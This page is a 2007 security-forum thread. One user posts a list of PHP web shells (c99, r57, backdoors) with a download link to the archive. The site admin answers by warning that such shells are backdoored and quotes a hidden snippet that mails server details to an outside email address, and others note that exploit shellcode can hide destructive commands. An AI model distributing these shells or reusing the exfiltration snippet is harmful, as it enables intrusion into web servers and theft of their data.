Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 38
Members: 0
Total: 38
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Shell commands injection -> Shell Collection 100% working
Post new topicReply to topic View previous topic :: View next topic
Shell Collection 100% working
PostPosted: Sun Dec 30, 2007 10:22 am Reply with quote
nox
Advanced user
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




.:: Collection Shell ::.

accept_language.txt
Ajax_PHP Command Shell.txt
Antichat Shell v1.3.txt
Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
aZRaiLPhp v1.0.txt
backupsql.txt
c99.txt
c99_locus7s.txt
c99_madnet.txt
c99_PSych0.php
c99_w4cking.txt
Crystal.txt
ctt_sh.txt
cybershell.txt
dC3 Security Crew Shell PRiV.txt
Dive Shell 1.0 - Emperor Hacking Team.txt
DTool Pro.txt
Dx.txt
GFS web-shell ver 3.1.7 - PRiV8.txt
gfs_sh.txt
h4ntu shell [powered by tsoi].txt
iMHaPFtp.txt
ironshell.txt
JspWebshell 1.2.txt
KAdot Universal Shell v0.1.6.txt
lamashell.txt
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt
load_shell.txt
matamu.txt
Moroccan Spamers Ma-EditioN By GhOsT.txt
myshell.txt
Mysql interface v1.0.txt
MySQL Web Interface Version 0.8.txt
mysql.txt
mysql_tool.txt
NCC-Shell.txt
NetworkFileManagerPHP.txt
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt
nshell.txt
nstview.txt
PH Vayv.txt
PHANTASMA.txt
PHP Shell.txt
php-backdoor.txt
php-include-w-shell.txt
pHpINJ.txt
PHPJackal.txt
PHPRemoteView.txt
Private-i3lue.txt
pws.txt
r57.txt
r57_iFX.txt
r57_kartal.txt
r57_Mohajer22.txt
rootshell.txt
ru24_post_sh.txt
s72 Shell v1.1 Coding.txt
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt
Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
sh3lls.rar
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt
simple_cmd.txt
simple-backdoor.txt
SimShell 1.0 - Simorgh Security MGZ.txt
SnIpEr_SA Shell.txt
Uploader.txt
WinX Shell.txt
Worse Linux Shell.txt
zacosmall.txt


http://rapidshare.com/files/68569109/Shellz_collection_by_XtremeHacker_aka_deadlyhaxorz_aka_CyberCriminal.rar
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Dec 31, 2007 12:16 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Word of warning - any of these shells can be backdoored, so that somebody will actually exploit the exploiter Smile

Sample from one of the shells from this package:

Code:

}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");


Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Dec 31, 2007 1:15 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




waraxe wrote:
Word of warning - any of these shells can be backdoored, so that somebody will actually exploit the exploiter Smile

Sample from one of the shells from this package:

Code:

}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");


Rolling Eyes


In r57 have same shitt's.
View user's profile Send private message
PostPosted: Wed Jan 02, 2008 2:41 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




most of it Smile
better to create your own web shell Smile

and thats not only in web shell, also in most of exploits (hide under shellcode? for example) Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Thu Jan 03, 2008 6:30 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




y3dips wrote:
most of it Smile
better to create your own web shell Smile

and thats not only in web shell, also in most of exploits (hide under shellcode? for example) Rolling Eyes


Yes, there were incidents even in bugtraq, where backdoors or just "rm -rf" were hidden to shellcode in 0-day exploit Smile
View user's profile Send private message Send e-mail Visit poster's website
Shell Collection 100% working
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.034 Seconds